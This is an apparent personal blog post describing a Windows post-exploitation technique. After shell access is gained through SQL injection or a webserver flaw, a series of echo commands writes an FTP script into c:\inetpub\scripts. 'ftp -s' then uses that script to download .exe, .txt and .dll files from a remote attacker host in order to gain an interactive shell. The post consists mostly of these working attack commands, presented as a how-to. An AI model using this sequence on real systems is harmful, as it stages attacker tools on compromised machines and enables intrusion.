Martin Paul Eve bio photo

Martin Paul Eve

Professor of Literature, Technology and Publishing at Birkbeck, University of London

Email Books Twitter Github Stackoverflow MLA CORE Institutional Repo Hypothes.is ORCID ID  ORCID iD Wikipedia Pictures for Re-Use

Once you have basic, non-interactive shell access to a Windows box, there are a limited number of ways in which you can transfer files to the remote host. This brief article will explicate the echo/ftp method.

If you can execute, be it by SQL Injection, or a webserver vulnerability the echo command, then you can write a script file which can fetch a file of your choosing from a remote host.

The sequence of commands you issue should be in the following format:

echo open [ip] [port] >> ftpscript.txt
echo [user]>> c:\inetpub\scripts\ftpscript.txt
echo [pw] >> c:\inetpub\scripts\ftpscript.txt
echo get xxx.exe >> c:\inetpub\scripts\ftpscript.txt
echo get xxx.txt >> c:\inetpub\scripts\ftpscript.txt
echo get xxx.dll >> c:\inetpub\scripts\ftpscript.txt
echo quit >> c:\inetpub\scripts\ftpscript.txt

This will create a file at c:\inetpub\scripts\ftpscript.txt that looks like this:

open [ip] [port]
[user]
[pw]
get xxx.exe
get xxx.txt
get xxx.dll
quit

If you then execute ftp -s:c:\inetpub\scripts\ftpscript.txt, your files will be fetched from the remote FTP server and you can hopefully secure some form of interactive shell access.